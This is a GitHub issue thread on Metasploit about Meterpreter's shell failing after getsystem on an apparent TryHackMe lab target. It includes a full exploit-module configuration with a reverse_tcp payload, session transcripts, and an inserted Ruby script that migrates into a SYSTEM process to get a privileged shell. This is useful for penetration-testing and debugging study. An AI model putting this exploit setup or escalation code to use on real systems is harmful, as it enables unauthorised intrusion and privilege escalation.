rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Meterpreter's shell command no longer interactive after getsystem command is run #14508

Open AlanFoster opened 3 years ago

AlanFoster commented 3 years ago

Steps to reproduce

Target: https://tryhackme.com/room/adventofcyber2 Day 12 Task 17 - Networking Ready, set, elf.

Getting a meterpreter shell works fine; running the shell command also works fine. However, after running getsystem the shell command no longer works as expected:

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin
============================================================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  6985     fil   2020-12-13 19:38:05 -0500  Vctra.b64
100777/rwxrwxrwx  825      fil   2020-11-18 22:49:25 -0500  elfwhacker.bat
100666/rw-rw-rw-  27       fil   2020-11-19 17:05:43 -0500  flag1.txt
100777/rwxrwxrwx  73802    fil   2020-12-13 19:33:07 -0500  hNSSF.exe
100777/rwxrwxrwx  2332672  fil   2020-12-13 19:29:37 -0500  ncat.exe
100777/rwxrwxrwx  73802    fil   2020-12-13 19:38:42 -0500  njJpP.exe
100777/rwxrwxrwx  73802    fil   2020-12-13 19:44:55 -0500  xlueA.exe

meterpreter > shell
Process 3208 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 4277-4242

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin

14/12/2020  00:44    <DIR>          .
14/12/2020  00:44    <DIR>          ..
19/11/2020  21:39               825 elfwhacker.bat
19/11/2020  22:06                27 flag1.txt
14/12/2020  00:33            73,802 hNSSF.exe
14/12/2020  00:29         2,332,672 ncat.exe
14/12/2020  00:38            73,802 njJpP.exe
14/12/2020  00:38             6,985 Vctra.b64
14/12/2020  00:44            73,802 xlueA.exe
               7 File(s)      2,561,915 bytes
               2 Dir(s)   6,271,860,736 bytes free

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>exit
exit
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 3412 created.
Channel 2 created.
meterpreter > shell
Process 4012 created.
Channel 3 created.
meterpreter > shell
Process 3772 created.
Channel 4 created.
meterpreter >

Expected behavior

shell works after running getsystem

Current behavior

shell no longer works:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 3412 created.
Channel 2 created.
meterpreter > shell
Process 4012 created.
Channel 3 created.
meterpreter > shell
Process 3772 created.
Channel 4 created.
meterpreter > 

Logs show:

[12/13/2020 19:52:36] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop

Metasploit version

msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > version
Framework: 6.0.18-dev
Console  : 6.0.18-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/core]
loglevel=3
sessionlogging=true
[framework/features]
wrapped_tables=true
RHOST_HTTP_URL=false
[framework/ui/console]
ActiveModule=exploit/windows/http/tomcat_cgi_cmdlineargs
[windows/http/tomcat_cgi_cmdlineargs]
RPORT=8080
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
ListenerComm=
SSL=false
SSLCert=
SSLCompression=false
SSLCipher=
TCP::max_send_size=0
TCP::send_delay=0
RHOSTS=10.10.227.63
VHOST=
Proxies=
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HttpUsername=
HttpPassword=
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
HTTP::no_cache=false
HTTP::chunked=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
URIHOST=
URIPORT=
SendRobots=false
CMDSTAGER::FLAVOR=auto
CMDSTAGER::DECODER=
CMDSTAGER::TEMP=
CMDSTAGER::SSL=false
TARGETURI=/cgi-bin/elfwhacker.bat
AutoCheck=true
ForceExploit=false
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=tun0
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
EXITFUNC=process
PayloadBindPort=
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
TARETURI=/cgi-bin/elfwhacker.bat
```

History

The following commands were run during the session and before this issue occurred:

```
2885 use windows/http/tomcat_cgi_cmdlineargs
2886 options
2887 set LHOST tun0
2888 set TARETURI /cgi-bin/elfwhacker.bat
2889 set RHOSTS 10.10.227.63
2890 options
2891 run
2892 set TARGETURI /cgi-bin/elfwhacker.bat
2893 check
2894 run
2895 dir
2896 shell
2897 getsystem
2898 shell
2899 setg loglevel 3
2900 sessions -i -1
2901 shell
2902 debug
```

Framework Errors

The following framework errors occurred before the issue occurred:

```
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/13/2020 19:41:36] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in ntfea9000 = (pack(''
[12/13/2020 19:41:36] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/13/2020 19:41:36] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/13/2020 19:41:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/13/2020 19:41:36] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
```

Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

Framework Logs

The following framework logs were recorded before the issue occurred:

```
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to bind
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to bind
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: none to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: none to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:46:32] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:46:38] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:46:41] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:47:13] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:47:55] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
```

Web Service Logs

The following web service logs were recorded before the issue occurred:

```
msf-ws.log does not exist.
```

Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 6.0.18-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```

thornflynt commented 3 years ago

I am having the same issue with the exact same context on tryhackme's AoC2.

gwillcox-r7 commented 3 years ago

Hmm, just retested this on a Windows Server 2016 x64 target and, as near as I can tell, this doesn't seem to be occurring for me.

msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.26.192.240:4444
[*] Sending stage (200262 bytes) to 172.26.192.240
[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.26.192.240:4444) at 2021-02-22 16:10:10 -0600

meterpreter > shell
Process 1672 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator

C:\Users\Administrator\Desktop>exit
exit
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 7956 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator

C:\Users\Administrator\Desktop>exit
exit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.26.192.240   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > 

When I tried it on the target using a command stager exploit, which I think is where the difference comes in, I notice I don't get the same warning about trying to run shell as the SYSTEM user and the automatic downgrading taking place. Furthermore, when I try to use rev2self to drop back down to a normal user, I'm able to run the shell command again, despite previously not being able to run it.

msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: TBFC-WEB-01\elfmcskidy
meterpreter > sysinfo
Computer        : TBFC-WEB-01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2732 created.
Channel 1 created.
meterpreter > sysinfo
Computer        : TBFC-WEB-01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > rev2self
meterpreter > shell
Process 1096 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>
T0m-Ph commented 3 years ago

I faced a similar issue: running the getsystem command seemingly successfully, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with the getsystem command) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.

To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using getsystem, but before requesting a shell.

Finally, I feel like this migration part could probably be automated and added to the getsystem command.

Let me know if that fixes your issue :)

AlanFoster commented 3 years ago

@JackPepper Thanks for the workaround, that worked for me. After running getsystem, and migrating to the spoolsv.exe, it's now possible to open a shell :+1:

Also confirmed that rev2self works, but since you're no longer system with that approach - it's not as practical
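
The workaround described in the two comments above (getsystem, then migrate into a SYSTEM-owned process such as spoolsv.exe before calling shell, with rev2self as the fallback), written out as an added example. This is not Metasploit's own code and not code posted by anyone in this thread. The first half is plain Ruby over a constructed process list so it runs anywhere; the second half assumes a live Meterpreter session object named `client` that exposes the stdapi API (`client.sys.process.get_processes`, `client.sys.process.getpid`, `client.core.migrate`, `client.sys.config.getuid`, `client.sys.config.revert_to_self`, `client.sys.process.execute`) and is only reached from inside msfconsole or a post module. The host and user names in the sample list are taken from the session output above; the pids and process set are made up.

```ruby
# Added example for this issue; not Metasploit's own code and not code posted
# by anyone in the thread. Assumes the Rex stdapi Meterpreter client API for the
# live half; the process list below is constructed sample data.

SYSTEM_USER = 'NT AUTHORITY\\SYSTEM'.freeze

# Migration hosts in order of preference. spoolsv.exe comes first because it is
# what worked in the thread and is not a critical process (if the injected thread
# crashes it, only printing dies). winlogon.exe and services.exe also run as
# SYSTEM but are critical processes: crashing them bugchecks the host, so they
# are last resorts. lsass.exe is deliberately absent for the same reason.
PREFERRED_HOSTS = %w[spoolsv.exe winlogon.exe services.exe].freeze

# `processes` is shaped like client.sys.process.get_processes: an array of hashes
# with 'pid', 'name', 'user' and 'arch'. Returns the best SYSTEM-owned candidate
# (never our own pid), or nil if there is none. `arch` is optional because an
# x86 Meterpreter migrated into x64 spoolsv.exe fine in the thread; pass 'x86'
# or 'x64' to pin the target architecture.
def pick_migration_target(processes, own_pid:, arch: nil)
  candidates = processes.select do |p|
    p['pid'] != own_pid &&
      p['user'].to_s.casecmp?(SYSTEM_USER) &&
      (arch.nil? || p['arch'].to_s == arch)
  end
  return nil if candidates.empty?

  # Lowest preference index wins; names not in the list sort after it; ties on pid.
  candidates.min_by do |p|
    [PREFERRED_HOSTS.index(p['name'].to_s.downcase) || PREFERRED_HOSTS.size, p['pid']]
  end
end

# Constructed sample list (not captured from the target); host and user names
# are the ones seen in the thread, pids and process names are invented.
SAMPLE_PROCESSES = [
  { 'pid' => 4,    'name' => 'System',       'user' => 'NT AUTHORITY\\SYSTEM',    'arch' => 'x64' },
  { 'pid' => 620,  'name' => 'services.exe', 'user' => 'NT AUTHORITY\\SYSTEM',    'arch' => 'x64' },
  { 'pid' => 1184, 'name' => 'spoolsv.exe',  'user' => 'NT AUTHORITY\\SYSTEM',    'arch' => 'x64' },
  { 'pid' => 2908, 'name' => 'tomcat9.exe',  'user' => 'TBFC-WEB-01\\elfmcskidy', 'arch' => 'x64' },
  { 'pid' => 3772, 'name' => 'xlueA.exe',    'user' => 'TBFC-WEB-01\\elfmcskidy', 'arch' => 'x86' }
].freeze

# Live-session half (assumes `client` is a Meterpreter session; not run here).
# After getsystem the current thread holds a SYSTEM impersonation token, but a
# child process inherits the process's primary token, which is still the low
# privileged one, so `shell` spawns cmd.exe that never becomes usable. Migrating
# into a process whose primary token already is SYSTEM's fixes that. If the
# migration fails we fall back to rev2self, which gives a working but
# unprivileged shell, exactly as observed in the thread.
def system_shell(client)
  unless client.sys.config.getuid.to_s.casecmp?(SYSTEM_USER)
    raise 'run getsystem first; this thread is not impersonating SYSTEM'
  end

  target = pick_migration_target(client.sys.process.get_processes,
                                 own_pid: client.sys.process.getpid)
  raise 'no SYSTEM-owned process available to migrate into' unless target

  begin
    client.core.migrate(target['pid'])
  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
    client.sys.config.revert_to_self
    raise "migrate to #{target['name']} (#{target['pid']}) failed (#{e.message}); reverted to self"
  end

  # Channelized + hidden: output comes back over the Meterpreter channel rather
  # than a console window on the target. Returning whoami lets the caller confirm
  # the new primary token really is SYSTEM before opening an interactive shell.
  process = client.sys.process.execute('cmd.exe', '/c whoami',
                                       'Channelized' => true, 'Hidden' => true)
  process.channel.read.to_s.strip
end
```

In msfconsole the selection half can be driven from `irb` on a session with `pick_migration_target(client.sys.process.get_processes, own_pid: client.sys.process.getpid)`, then a plain `migrate <pid>` followed by `shell`; `system_shell(client)` does the same steps in one call and returns the `whoami` string, which should read `nt authority\system` once the migration succeeded.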

Unibrighter commented 1 year ago

> I faced a similar issue: running the getsystem command seemingly successfully, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with the getsystem command) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.
>
> To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using getsystem, but before requesting a shell.
>
> Finally, I feel like this migration part could probably be automated and added to the getsystem command.
>
> Let me know if that fixes your issue :)

Thanks @T0m-Ph, this really helped me while doing one of the CTFs. It's a great tip and I'm glad to see someone who has been in the same situation solved this for the people who will be here in the future. :)